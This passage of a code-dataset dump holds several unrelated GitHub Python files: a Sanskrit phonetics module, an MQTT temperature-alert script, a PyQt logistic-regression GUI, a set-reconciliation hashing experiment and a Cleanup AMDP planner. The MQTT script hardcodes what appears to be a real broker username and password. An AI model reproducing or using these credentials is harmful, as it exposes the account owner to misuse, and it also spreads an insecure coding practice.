user\n\n","repo_name":"lgarzon09/connek_back","sub_path":"routers/users_router.py","file_name":"users_router.py","file_ext":"py","file_size_in_byte":2017,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9373034318","text":"import matplotlib.pyplot as plt\nfrom pylab import *\nx=linspace(0,5,10)\ny=x**2\n\nfig=plt.figure()\n\naxes=fig.add_axes([0.1,0.1,0.8,0.8])\naxes.plot(x,y,'r')\n\nplt.show()","repo_name":"wlccomeon/machine","sub_path":"Ch18/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":164,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"4565315525","text":"# -*- coding: utf-8 -*-\n\"\"\"\n vyakarana.sounds\n ~~~~~~~~~~~~~~~~\n\n Classes for working with various sounds.\n\n :license: MIT and BSD\n\"\"\"\n\n\ndef memoize(c):\n cache = {}\n get_key = lambda a, kw: tuple(a) + (frozenset(kw.items()),)\n\n def memoized(*a, **kw):\n key = get_key(a, kw)\n if key not in cache:\n cache[key] = c(*a, **kw)\n return cache[key]\n return memoized\n\n\n@memoize\nclass Sound(object):\n\n \"\"\"A Sanskrit sound.\n\n These sounds can be transformed in ways defined by the grammar.\n\n :param value: the Sound's value\n \"\"\"\n\n #: This organizes sounds by their point of articulation.\n ASYA = [\n # kaṇṭha\n set('aAkKgGNh'),\n # tālu\n set('iIcCjJYyS'),\n # mūrdhan\n set('fFwWqQRrz'),\n # danta\n set('xXtTdDnls'),\n # oṣṭha\n set('uUpPbBmv'),\n # kaṇṭha-tālu\n set('eE'),\n # kaṇṭha-oṣṭha\n set('oO'),\n # pure nasal\n set('M')\n ]\n\n #: This organizes sounds by their articulatory effort.\n PRAYATNA = [\n # spṛṣṭa\n set('kKgGNcCjJYwWqQRtTdDnpPbBmh'),\n # īṣatspṛṣṭa\n set('yrlv'),\n # śar\n set('Szs'),\n # vowels\n set('aAiIuUfFxeEoO'),\n ]\n\n #: This organizes sounds by their nasality.\n NASIKA = [\n # nasal\n set('NYRnmM'),\n # non-nasal\n set('aAiIuUfFxeEoOkKgGcCjJwWQQtTdDpPbByrlvSzsh'),\n ]\n\n #: This organizes sounds by their \"voice.\"\n GHOSA = [\n # ghoṣavat (voiced)\n set('aAiIuUfFxXeEoOgGNjJYqQRdDnbBmyrlvh'),\n # aghoṣa (unvoiced)\n set('kKcCwWtTpPSzs'),\n ]\n\n #: This organizes sounds by their aspiration.\n PRANA = [\n # mahāprāṇa (aspirated)\n set('KGCJWQTDPBh'),\n # alpaprāṇa (unaspirated)\n set('aAiIuUfFxXeEoOkgNcjYwqRtdnpbmyrlvSzs'),\n ]\n\n def __init__(self, value):\n self.value = value\n\n def asavarna(self, other):\n \"\"\"Returns the sounds that are not savarna to this one.\n\n One subtle point here is that the 'savarna' and 'asavarna' are\n both undefined between consonants and vowels.\n\n :param other:\n \"\"\"\n ac = Pratyahara('ac')\n same_ac = self.value in ac and other in ac\n return same_ac and other not in self.savarna_set\n\n def closest(self, items):\n \"\"\"Return the phonetically closest value. If no close value\n exists, return `self.value`.\n\n :param items: a list of letters\n \"\"\"\n best = self.value\n best_score = 0\n\n self_names = self.names()\n for x in items:\n score = len(Sound(x).names().intersection(self_names))\n if score > best_score:\n best, best_score = x, score\n return best\n\n def names(self):\n \"\"\"Get the various designations that apply to this sound. This\n is used to determine how similar two sounds are to each other.\n \"\"\"\n try:\n return self._names\n except AttributeError:\n pass\n\n self._names = set()\n categories = [self.ASYA, self.PRAYATNA, self.NASIKA, self.GHOSA,\n self.PRANA]\n for i, category in enumerate(categories):\n for j, group in enumerate(category):\n if self.value in group:\n self._names.add('%s_%s' % (i, j))\n\n return self._names\n\n def savarna(self, other):\n \"\"\"\n\n :param other: some sound\n \"\"\"\n return other in self.savarna_set\n\n @property\n def savarna_set(self):\n \"\"\"Return the sounds that are savarna to this one. The 'savarna'\n relation is defined by the following rules:\n\n 1.1.9 tulyAsyaprayatnaM savarNam\n 1.1.10 nAjjhalau\n \"\"\"\n s = self.value\n a = p = None\n\n for a in self.ASYA:\n if s in a:\n break\n for p in self.PRAYATNA:\n if s in p:\n break\n if a is None:\n a = p\n elif p is None:\n p = a\n\n results = a.intersection(p)\n is_ac = s in Pratyahara('ac')\n\n # 1.1.10 na ac-halau\n return set([x for x in results if (x in Pratyahara('ac')) == is_ac])\n\n\nclass SoundCollection(object):\n\n def __init__(self, *a, **kw):\n raise NotImplementedError\n\n def __contains__(self, item):\n \"\"\"\n :param item: some sound\n \"\"\"\n return item in self.values\n\n def __iter__(self):\n return iter(self.values)\n\n def __len__(self):\n return len(self.values)\n\n def __repr__(self):\n return \"<%s('%s')>\" % (self.__class__.__name__, self.name)\n\n\n@memoize\nclass Sounds(SoundCollection):\n\n \"\"\"A shorthand for grouping Sanskrit sounds.\n\n :param phrase: a group of designations\n \"\"\"\n\n def __init__(self, phrase):\n self.name = phrase\n if isinstance(phrase, basestring):\n items = phrase.split()\n else:\n items = phrase\n\n v = self.values = set()\n for item in items:\n\n first, last = (item[0], item[-1])\n simple_vowel = len(item) == 1 and item in Pratyahara('ak')\n\n # 1.1.69 aNudit savarNasya cApratyayaH\n if last == 'u' or simple_vowel:\n v.update(Sound(first).savarna_set)\n # 1.1.70 taparas tatkAlasya\n elif last == 't':\n v.update([first])\n # Generic letter\n elif len(item) == 1:\n v.update(item)\n # Pratyahara\n else:\n v.update(Pratyahara(item).values)\n\n\n@memoize\nclass Pratyahara(SoundCollection):\n\n \"\"\"A shorthand for grouping Sanskrit sounds.\n\n The various pratyaharas are defined in the Shiva Sutras, which\n precede the Ashtadhyayi proper.\n\n :param value: the pratyahara itself, e.g. 'hal', 'ak', 'Jal'\n :param second_R: ``True`` iff we should use the second 'R' as our\n boundary. Since pratyaharas formed with this letter\n are usually ambiguous, we have to be explicit here.\n \"\"\"\n\n rules = [\n ('aAiIuU', 'R'),\n ('fFxX', 'k'),\n ('eo', 'N'),\n ('EO', 'c'),\n ('hyvr', 'w'),\n ('l', 'R'),\n ('YmNRn', 'm'),\n ('JB', 'Y'),\n ('GQD', 'z'),\n ('jbgqd', 'S'),\n ('KPCWTcwt', 'v'),\n ('kp', 'y'),\n ('Szs', 'r'),\n ('h', 'l'),\n ]\n\n def __init__(self, name, second_R=False):\n first = name[0]\n limit = name[-1]\n found_first = False\n\n self.name = name\n self.values = set([first])\n\n for items, it in self.rules:\n if found_first:\n self.values.update(items)\n elif first in items:\n self.values.update(items.partition(first)[-1])\n found_first = True\n if found_first and it == limit:\n if second_R:\n second_R = False\n else:\n break\n","repo_name":"sanskrit/vyakarana","sub_path":"vyakarana/sounds.py","file_name":"sounds.py","file_ext":"py","file_size_in_byte":7089,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"40"} +{"seq_id":"2348758370","text":"import paho.mqtt.client as mqtt\nimport time\n\ntopic = 'Test/#'\nlista_valori = []\nprag = 25\ndepasiri_maxime = 5\n\n\ndef on_connect(client, userdata, flags, rc):\n print(\"Connect with Code: \", str(rc))\n #Subscribe Topic:\n client.subscribe(topic)\n\ndef on_message(client, userdata, msg):\n print(str(msg.payload)[2:-1])\n lista_valori.append(float(str(msg.payload)[2:-1]))\n #print(lista_valori)\n nr_depasiri = 0\n for v in lista_valori:\n if v > prag:\n nr_depasiri += 1\n if nr_depasiri >= depasiri_maxime:\n print(\"ALERT!!!\")\n\n\nclient = mqtt.Client()\nclient.on_connect = on_connect\nclient.on_message = on_message\n\nclient.connect(\"farmer.cloudmqtt.com\", 16697, 60)\nclient.username_pw_set(\"yssrliya\", \"8a6l_tOwTMX9\")\nclient.loop_forever()\n","repo_name":"marinabarbu/MQTT_Grafana_OpenGate","sub_path":"alert_for_temp.py","file_name":"alert_for_temp.py","file_ext":"py","file_size_in_byte":776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"25970414932","text":"import os,sys\nimport h5py\nimport numpy as np\nimport networkx as nx\nimport neuroglancer\n\nfrom T_util import readh5,ngLayer,relabel\n\nDo='file:///var/www/html/dataset/jwr15_df/'\n\n\nip='localhost'\npp=10000+int(np.random.random()*10000)\n\n\nneuroglancer.set_server_bind_address(bind_address=ip,bind_port=pp)\nviewer=neuroglancer.Viewer()\n\n\n\n\n\n\nres = [128,256,120]\nbfs= 'bfs'\nedgTh = [40,1] # threshold\n\n# modify these two for the skeleton you want to visualize\nseg = readh5('/home/xingyu/PycharmProjects/skeleton/neuron/cell9_d.h5').astype(np.uint16)\nSKEL_FOLDER = '/home/xingyu/PycharmProjects/skeleton/outputs/9'\n\n\n\nall_nodes = readh5(os.path.join(SKEL_FOLDER,'new_node_pos.h5'))\n\nreduced_nodes = readh5(os.path.join(SKEL_FOLDER,'graph-bfs-%d-10.h5'%(edgTh[0])))\n\n\nGraph = nx.read_gpickle(os.path.join(SKEL_FOLDER,'graph-%s.obj'%(bfs)))\n\nnew_G = nx.read_gpickle(os.path.join(SKEL_FOLDER,'new_graph.obj'))\nedge_list = new_G.edges()\n\n\n\nwith viewer.txn() as s:\n s.layers.append(name=\"den\",layer=ngLayer(seg,res))\n s.layers['den'].segments.update(range(1,30))\n s.layers['den'].visible = True\n\n s.layers.append(name=\"nodes\",layer=ngLayer(reduced_nodes,res))\n s.layers['nodes'].segments.update(range(1,3))\n s.layers['nodes'].visible = True\n\n s.layers.append(name='edges',layer=neuroglancer.AnnotationLayer(voxelSize=res))\n annotations = s.layers[-1].annotations\n line_id = 1\n for edge in edge_list:\n annotations.append(\n neuroglancer.LineAnnotation(\n id=line_id,\n point_a=[all_nodes[edge[0]][2],all_nodes[edge[0]][1],all_nodes[edge[0]][0]],\n point_b=[all_nodes[edge[1]][2],all_nodes[edge[1]][1],all_nodes[edge[1]][0]]\n )\n )\n\n\n line_id += 1\n\n\n\nprint(viewer)\n","repo_name":"charlotte12l/NeuronShapeAnalysis","sub_path":"vis.py","file_name":"vis.py","file_ext":"py","file_size_in_byte":1770,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"70771727162","text":"import sys\nfrom PyQt5 import QtCore, QtWidgets, uic\n\nimport pandas as pd\nimport sys\nfrom PyQt5 import QtWidgets, uic\nimport numpy as np\nfrom sklearn import preprocessing\n# import matplotlib.pyplot as plt\n# plt.rc(\"font\", size=14)\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.model_selection import train_test_split\nfrom imblearn.over_sampling import SMOTE\nimport statsmodels.api as sm\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn import metrics\n\nclass PageMain(QtWidgets.QMainWindow):\n\n def predict(self, WS, CC, RH, MT, WD):\n data = pd.read_csv('dataAI.csv', header=0)\n data = data.dropna()\n\n data_final = data\n data_final.columns.values\n\n X = data_final.loc[:, data_final.columns != 'AQI']\n y = data_final.loc[:, data_final.columns == 'AQI']\n\n\n os = SMOTE(random_state=0)\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=0)\n columns = X_train.columns\n os_data_X, os_data_y = os.fit_resample(X_train, y_train)\n os_data_X = pd.DataFrame(data=os_data_X, columns=columns)\n os_data_y = pd.DataFrame(data=os_data_y, columns=['AQI'])\n\n cols = ['WindSpeed', 'CloudCover',\n 'RelativeHumidity', 'Minimum Temperature', 'Wind Direction']\n X = os_data_X[cols]\n y = os_data_y['AQI']\n\n\n logit_model = sm.Logit(y, X)\n result = logit_model.fit()\n\n logit_model = sm.Logit(y, X)\n result = logit_model.fit()\n\n\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=0)\n logreg = LogisticRegression()\n logreg.fit(X_train, y_train)\n\n\n\n X_test1 = pd.DataFrame([[(WS), (CC), (RH), (MT), (WD)]],\n columns=['WindSpeed', 'CloudCover', 'RelativeHumidity', 'Minimum Temperature',\n 'Wind Direction'])\n y_pred = logreg.predict(X_test1)\n\n\n if (y_pred == 1):\n return 1\n return 0\n\n def __init__(self):\n super(PageMain, self).__init__()\n uic.loadUi(\"AI.ui\", self)\n\n self.btn.clicked.connect(self.setText)\n\n self.show()\n\n def setText(self):\n a = 0.0\n b = 0.0\n c = 0.0\n d = 0.0\n e = 0.0\n\n WS = self.ws.text()\n CC = self.cc.text()\n RH = self.rh.text()\n MT = self.mt.text()\n WD = self.wd.text()\n\n if (WS == \"\" or CC == \"\" or RH == \"\" or MT == \"\" or WD == \"\"):\n QtWidgets.QMessageBox.warning(self, 'Thông báo', 'KHÔNG ĐƯỢC BỎ TRỐNG!')\n return\n else:\n if (WS.isdigit() == False) or (CC.isdigit() == False) or (RH.isdigit() == False) or (MT.isdigit() == False) or (WD.isdigit() == False):\n QtWidgets.QMessageBox.warning(self, 'Thông báo', 'NHẬP SAI VUI LÒNG NHẬP LẠI!')\n return\n\n a = a + float(WS)\n b = b + float(CC)\n c = c + float(RH)\n d = d + float(MT)\n e = e + float(WD)\n\n if (0 <= a <= 100) and (0 <= b <= 100) and (0 <= c <= 100) and (0 <= d <= 100) and (0 <= e <= 100):\n data = self.predict(a, b, c, d, e)\n\n if data == 0:\n txt = \"KHÔNG Ô NHIỄM\"\n else:\n txt = \"Ô NHIỄM\"\n\n self.lineEdit.setText(txt)\n else:\n QtWidgets.QMessageBox.warning(self, 'Thông báo', 'NHẬP SAI VUI LÒNG NHẬP LẠI!')\n\n\n\napp = QtWidgets.QApplication(sys.argv)\nwindow = PageMain()\nwindow.show()\nsys.exit(app.exec_())","repo_name":"TrongHung21/AMLAPF","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"718198731","text":"import pathlib\nimport yaml\nfrom dotmap import DotMap\n\n\nBASE_DIR = pathlib.Path(__file__).parent.parent\nSTATIC_DIR = BASE_DIR/'static'\nTEMPLATES_DIR = STATIC_DIR/'templates'\nconfig_path = BASE_DIR/'config.yaml'\n\n\ndef get_config(path):\n with open(path) as file:\n config = yaml.safe_load(file)\n return config\n\n\nconfig = DotMap(get_config(config_path))\n","repo_name":"rozumalex/notify","sub_path":"notify/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"42648207805","text":"from scripts.entities.player import Player\n\n\nclass PlayerFighter:\n\n def __init__(self, player: Player, screen, strength, speed, attack_speed, hp, defense, stamina):\n\n self.player = player\n self.screen = screen\n self.strength = strength\n self.speed = speed\n self.attack_speed = attack_speed\n self.hp = hp\n self.defense = defense\n self.stamina = stamina\n\n self.equipped = {\n \"chestplate\": None,\n \"leggings\": None,\n \"boots\": None,\n \"weapon\": None,\n \"shield\": None,\n \"potions\": []\n }\n\n\n def use_potion(self, potion_index):\n # use specified potion\n if self.equipments[\"potions\"][potion_index]:\n self.equipments[\"potions\"][potion_index].use()\n self.equipments[\"potions\"][potion_index] = None\n\n def win(self, prize_money):\n # increase player money and popularity for winning\n self.player.money += prize_money\n self.player.popularity += 1\n self.player.wins += 1\n\n def lose(self):\n # decrease player popularity for losing\n self.player.popularity -= 1\n\n","repo_name":"AngelFireLA/Projet-Gladiateur","sub_path":"scripts/entities/player_fighter.py","file_name":"player_fighter.py","file_ext":"py","file_size_in_byte":1169,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"3449745692","text":"### Written by Ian Macleod (idm2114) and Imanol Uribe (iu2155) \n### for COMS 4342 HW2 Q2B \n\nimport random\nimport copy \nimport math\nimport collections\n\n\n# scale factor by which we increase size of arrays for sketches\n# each of the log_n sketches has size O(k) = 100k\nC = 100\n\ndef universal_hash(n, k, numHashFunctions):\n # smallest prime > 1000000 = 10000019\n p = 10000019\n H = []\n for i in range(numHashFunctions):\n a = random.randint(0,p-1)\n if a % 2 == 0:\n a += 1\n b = random.randint(0,p-1)\n H.append([a,b,p])\n return H\n\ndef eval_h(itm, hash_function, k):\n a = hash_function[0]\n b = hash_function[1]\n p = hash_function[2]\n return int(int((a * itm + b) % p) % (C*k))\n\n## creating sets with symmetric difference of size k and size n + k/2\ndef generate_sets(n,common,k):\n Alice = set() \n\n target_different = set()\n\n # init two sets with common elements\n while(len(Alice) < common):\n tmp = random.randint(1,n)\n Alice.add(tmp)\n\n Bob = copy.copy(Alice)\n\n for j in range(k):\n if j % 2 == 0 and j > 1:\n tmp = random.randint(1,n)\n while tmp in Bob or tmp in Alice:\n tmp = random.randint(1,n)\n Alice.add(tmp)\n target_different.add(tmp)\n else:\n tmp = random.randint(1,n)\n while tmp in Bob or tmp in Alice:\n tmp = random.randint(1,n)\n Bob.add(tmp)\n target_different.add(tmp)\n\n return list(Alice), list(Bob), list(target_different)\n\ndef generate_sketches(Alice, Bob, H, k):\n '''\n input: Alice's set, \n Bob's set, \n hash function family H, \n symmetric difference cardinality |A \\Delta B| = k\n '''\n a_sketch = []\n b_sketch = []\n # for each of the hash functions\n for i in range(len(H)):\n current_hash = H[i]\n a_curr = [ 0 for x in range(C * k) ]\n b_curr = [ 0 for x in range(C * k) ]\n for itm in Alice:\n a_curr[eval_h(itm, current_hash, k)] += itm\n for itm in Bob:\n b_curr[eval_h(itm, current_hash, k)] += itm\n a_sketch.append(a_curr)\n b_sketch.append(b_curr)\n return a_sketch, b_sketch\n\ndef recovery(a_sketch, b_sketch, k):\n stream = []\n for i in range(len(a_sketch)):\n diff = [ a_sketch[i][j] - b_sketch[i][j] for j in range(len(a_sketch[i])) ] \n for itm in diff:\n if itm != 0:\n stream.append(abs(itm))\n \n ## getting top k elements in stream\n c = collections.Counter(stream)\n return [ x[0] for x in c.most_common(k) ]\n\nif __name__=='__main__':\n success_count = 0\n num_trials = 100\n for i in range(num_trials):\n n = 100000000\n common = 10000\n k = 500\n alice, bob, target_different = generate_sets(n,common,k)\n H = universal_hash(n, k, math.floor(math.log2(n)))\n a_sketch, b_sketch = generate_sketches(alice, bob, H, k)\n estimated_different = recovery(a_sketch, b_sketch, k)\n if set(estimated_different) == set(target_different):\n success_count+=1\n print(\"Summary statistics:\")\n print(f\"num trials = {num_trials}\\nAlice and Bob set size = {common+int(k/2)}\\n|symmetric difference| = {k}\\nUniverse=(1,...,{n})\")\n print(f\"Success rate is {100 * success_count / num_trials}%\")\n\n","repo_name":"idm2114/andoni_hw2","sub_path":"hw2partb.py","file_name":"hw2partb.py","file_ext":"py","file_size_in_byte":3364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"71215283321","text":"from src.modules.get_answers.app.get_answers_controller import GetAnswersController\nfrom src.modules.get_answers.app.get_answers_usecase import GetAnswersUsecase\nfrom src.shared.environments import Environments\nfrom src.shared.helpers.external_interfaces.http_fastapi_requests import FastAPIHttpRequest, FastAPIHttpResponse\n\n\ndef get_answers_presenter(event, context):\n repo = Environments.get_answer_repo()()\n usecase = GetAnswersUsecase(repo)\n controller = GetAnswersController(usecase)\n \n httpRequest = FastAPIHttpRequest(data=event)\n response = controller(httpRequest)\n httpResponse = FastAPIHttpResponse(\n body=response.body, status_code=response.status_code, headers=response.headers\n )\n \n return httpResponse.to_dict()","repo_name":"Lucasdvs10/Projeto-Integrador-2023.2","sub_path":"src/modules/get_answers/app/get_answers_presenter.py","file_name":"get_answers_presenter.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"23484639671","text":"#!/usr/bin/env python -OO\nimport aocpaiv as aoc\nimport re\n\n\ndef solve(text):\n total = 0\n for x, y, c, p in re.findall(r'(\\d+)\\-(\\d+) (.)\\: (\\w+)', text):\n total += p.count(c) in range(int(x), int(y)+1)\n return total\n\n\ndef test():\n aoc.test_subject(solve)\n aoc.test(\"\"\"\n1-3 a: abcde\n1-3 b: cdefg\n2-9 c: ccccccccc\n\"\"\") == 2\n\n\nif __name__ == '__main__':\n test()\n print(solve(aoc.read_files()))\n","repo_name":"paiv/aoc2020","sub_path":"code/02-1-password-philosophy/solve.py","file_name":"solve.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"71193070522","text":"# Python imports\nfrom __future__ import print_function\nfrom collections import defaultdict\nimport copy\n\n# Other imports\nfrom simple_rl.mdp.MDPClass import MDP\nfrom simple_rl.planning import ValueIteration\nfrom simple_rl.amdp.AMDPTaskNodesClass import NonPrimitiveAbstractTask, RootTaskNode\nfrom simple_rl.amdp.abstr_domains.cleanup.AbstractCleanupL1StateClass import *\nfrom simple_rl.amdp.abstr_domains.cleanup.AbstractCleanupStateMapperClass import AbstractCleanupL1StateMapper\nfrom simple_rl.tasks.cleanup.cleanup_state import CleanUpState\n\nclass CleanupL1GroundedAction(NonPrimitiveAbstractTask):\n def __init__(self, l1_action_string, subtasks, l0_domain):\n '''\n Args:\n l1_action_string (str)\n subtasks (list)\n l0_domain (CleanUpMDP)\n '''\n self.action = l1_action_string\n self.l0_domain = l0_domain\n self.lifted_action = self.grounded_to_lifted_action(l1_action_string)\n\n tf, rf = self._terminal_function, self._reward_function\n NonPrimitiveAbstractTask.__init__(self, l1_action_string, subtasks, tf, rf)\n\n def _terminal_function(self, state):\n '''\n Args:\n state (CleanUpState)\n\n Returns:\n is_terminal (bool)\n '''\n\n assert type(state) == CleanUpState, 'Actual type of state is {}'.format(type(state))\n\n def _robot_door_terminal_func(s, door_color):\n return s.robot.current_door == door_color\n def _robot_room_terminal_func(s, room_color):\n return s.robot.current_room == room_color and s.robot.current_door == ''\n def _robot_to_block_terminal_func(s, block_color):\n return s.robot.adjacent_block == block_color\n def _block_to_door_terminal_func(s, block_color, door_color):\n for block in s.blocks:\n if block.block_color == block_color and block.current_door == door_color:\n return True\n return False\n def _block_to_room_terminal_func(s, block_color, room_color):\n for block in s.blocks:\n if block.block_color == block_color and block.current_room == room_color and block.current_door == '':\n return True\n return False\n\n state_mapper = AbstractCleanupL1StateMapper(self.l0_domain)\n projected_state = state_mapper.map_state(state)\n action_parameter = self.grounded_to_action_parameter(self.action)\n\n if self.lifted_action == 'toDoor':\n return _robot_door_terminal_func(projected_state, action_parameter)\n if self.lifted_action == 'toRoom':\n return _robot_room_terminal_func(projected_state, action_parameter)\n if self.lifted_action == 'toObject':\n return _robot_to_block_terminal_func(projected_state, action_parameter)\n if self.lifted_action == 'objectToDoor':\n return _block_to_door_terminal_func(projected_state, projected_state.robot.adjacent_block, action_parameter)\n if self.lifted_action == 'objectToRoom':\n return _block_to_room_terminal_func(projected_state, projected_state.robot.adjacent_block, action_parameter)\n\n raise ValueError('Lifted action {} not supported yet'.format(self.lifted_action))\n\n def _reward_function(self, state, action):\n assert type(state) == CleanUpState, 'Actual type of state is {}'.format(type(state))\n next_state = self.l0_domain.transition_func(state, action)\n return 1. if self._terminal_function(next_state) else 0.\n\n # -------------------------------\n # L1 Action Helper Functions\n # -------------------------------\n\n @staticmethod\n def grounded_to_lifted_action(grounded_action_str):\n return grounded_action_str.split('(')[0]\n\n @staticmethod\n def grounded_to_action_parameter(grounded_action_str):\n return grounded_action_str.split('(')[1].split(')')[0]\n\n @staticmethod\n def door_name_to_room_colors(door_name):\n return door_name.split('_')\n\n @staticmethod\n def get_other_room_color(state, door_name):\n connected_rooms = CleanupL1GroundedAction.door_name_to_room_colors(door_name)\n if state.robot.current_room == connected_rooms[0]:\n return connected_rooms[1]\n if state.robot.current_room == connected_rooms[1]:\n return connected_rooms[0]\n return ''\n\nclass CleanupRootGroundedAction(RootTaskNode):\n def __init__(self, action_str, subtasks, l1_domain, terminal_func, reward_func):\n self.action = action_str\n\n RootTaskNode.__init__(self, action_str, subtasks, l1_domain, terminal_func, reward_func)\n\nclass CleanupL1MDP(MDP):\n LIFTED_ACTIONS = ['toDoor', 'toRoom', 'toObject', 'objectToDoor', 'objectToRoom']\n\n # -------------------------------\n # Level 1 MDP description\n # -------------------------------\n\n def __init__(self, l0_domain):\n '''\n Args:\n l0_domain (CleanUpMDP)\n '''\n self.l0_domain = l0_domain\n\n state_mapper = AbstractCleanupL1StateMapper(l0_domain)\n l1_init_state = state_mapper.map_state(l0_domain.init_state)\n grounded_actions = CleanupL1MDP.ground_actions(l1_init_state)\n self.terminal_func = self._is_goal_state\n\n MDP.__init__(self, grounded_actions, self._transition_function, self._reward_function, l1_init_state)\n\n def _is_goal_state(self, state):\n for block in state.blocks: # type: CleanupL1Block\n if block.block_color == self.l0_domain.task.block_color:\n return block.current_room == self.l0_domain.task.goal_room_color and \\\n state.robot.current_room == self.l0_domain.task.goal_room_color\n raise ValueError('Did not find an L1 Block object with color {}'.format(self.l0_domain.task.block_color))\n\n def _reward_function(self, state, action):\n '''\n Args:\n state (CleanupL1State)\n action (str)\n\n Returns:\n reward (float)\n '''\n next_state = self._transition_function(state, action)\n return 1. if self._is_goal_state(next_state) else 0.\n\n def _transition_function(self, state, action):\n '''\n Args:\n state (CleanupL1State)\n action (str): grounded action\n\n Returns:\n next_state (CleanupL1State)\n '''\n next_state = copy.deepcopy(state)\n lifted_action = CleanupL1GroundedAction.grounded_to_lifted_action(action)\n\n if lifted_action == 'toDoor':\n target_door_name = CleanupL1GroundedAction.grounded_to_action_parameter(action)\n next_state = self._move_agent_to_door(state, target_door_name)\n\n if lifted_action == 'toRoom':\n destination_room = CleanupL1GroundedAction.grounded_to_action_parameter(action)\n next_state = self._move_agent_to_room(state, destination_room)\n\n if lifted_action == 'toObject':\n block_color = CleanupL1GroundedAction.grounded_to_action_parameter(action)\n next_state = self._move_agent_to_block(state, block_color)\n\n if lifted_action == 'objectToDoor':\n target_door_name = CleanupL1GroundedAction.grounded_to_action_parameter(action)\n # next_state = self._move_agent_to_door(state, target_door_name)\n next_state = self._move_block_to_door(next_state, target_door_name)\n\n if lifted_action == 'objectToRoom':\n destination_room = CleanupL1GroundedAction.grounded_to_action_parameter(action)\n next_state = self._move_agent_to_room(state, destination_room)\n next_state = self._move_block_to_room(next_state, destination_room)\n\n next_state.set_terminal(self._is_goal_state(next_state))\n\n return next_state\n\n @classmethod\n def ground_actions(cls, l1_state):\n '''\n Given a list of lifted/parameterized actions and the L0 cleanup domain,\n generate a list of grounded actions based on the attributes of the objects\n instantiated in the L0 domain.\n Args:\n l1_state (CleanupL1State): underlying ground level MDP\n\n Returns:\n actions (list): grounded actions\n '''\n grounded_actions = []\n\n for door in l1_state.doors: # type: CleanupL1Door\n grounded_actions.append(cls.LIFTED_ACTIONS[0] + '(' + str(door) + ')')\n grounded_actions.append(cls.LIFTED_ACTIONS[3] + '(' + str(door) + ')')\n\n for room in l1_state.rooms: # type: CleanupL1Room\n grounded_actions.append(cls.LIFTED_ACTIONS[1] + '(' + str(room) + ')')\n grounded_actions.append(cls.LIFTED_ACTIONS[4] + '(' + str(room) + ')')\n\n for block in l1_state.blocks: # type: CleanupL1Block\n grounded_actions.append(cls.LIFTED_ACTIONS[2] + '(' + str(block.block_color) + ')')\n\n return grounded_actions\n\n # -----------------------------------\n # Agent Navigation Helper functions\n # -----------------------------------\n\n @staticmethod\n def _move_agent_to_door(state, door_name):\n '''\n If the specified door connects the agent's current room, then it may transition to the door.\n Args:\n state (CleanupL1State)\n door_name (str)\n\n Returns:\n next_state (CleanupL1State)\n '''\n next_state = copy.deepcopy(state)\n destination_door = state.get_l1_door_for_color(door_name)\n if destination_door and state.robot.current_room in door_name:\n\n # If there is already a block at the door, then move it to the other room\n block = state.get_l1_block_for_color(state.robot.adjacent_block)\n if block:\n if block.current_door == door_name:\n other_room = CleanupL1GroundedAction.get_other_room_color(state, door_name)\n next_state = CleanupL1MDP._move_block_to_room(state, other_room)\n\n next_state.robot.current_door = door_name\n next_state.robot.current_room = destination_door.current_room\n return next_state\n\n @staticmethod\n def _move_agent_to_room(state, destination_room_color):\n '''\n Move the agent to the specified room if it is at a door connecting it to the said room.\n Args:\n state (CleanupL1State)\n destination_room_color (str)\n\n Returns:\n next_state (CleanupL1State)\n '''\n next_state = copy.deepcopy(state)\n if destination_room_color in state.robot.current_door:\n next_state.robot.current_room = destination_room_color\n next_state.robot.current_door = ''\n return next_state\n\n @staticmethod\n def _move_agent_to_block(state, block_color):\n '''\n Move the agent to the specified block if they are both in the same room.\n Args:\n state (CleanupL1State)\n block_color (str)\n\n Returns:\n next_state (CleanupL1State)\n '''\n next_state = copy.deepcopy(state)\n target_block = state.get_l1_block_for_color(block_color)\n if target_block:\n if target_block.current_room == state.robot.current_room:\n next_state.robot.adjacent_block = target_block.block_color\n next_state.robot.current_door = ''\n return next_state\n\n # -----------------------------------\n # Block Navigation Helper functions\n # -----------------------------------\n\n @staticmethod\n def _move_block_to_door(state, door_name):\n '''\n Move the agent's adjacent block to the specified door if they are in a room connected by said door.\n Args:\n state (CleanupL1State)\n door_name (str)\n\n Returns:\n next_state (CleanupL1State)\n '''\n next_state = copy.deepcopy(state)\n block = next_state.get_l1_block_for_color(next_state.robot.adjacent_block)\n destination_door = next_state.get_l1_door_for_color(door_name)\n if block and destination_door:\n if state.robot.current_room in door_name and block.current_room in door_name:\n next_state.robot.current_room = block.current_room\n next_state.robot.current_door = ''\n block.current_door = door_name\n block.current_room = destination_door.current_room\n return next_state\n\n @staticmethod\n def _move_block_to_room(state, destination_room_color):\n '''\n Move the block to the specified room if the block is at a door connecting said room.\n Args:\n state (CleanupL1State)\n destination_room_color (str)\n\n Returns:\n next_state (CleanupL1State)\n '''\n next_state = copy.deepcopy(state)\n block = next_state.get_l1_block_for_color(next_state.robot.adjacent_block)\n if 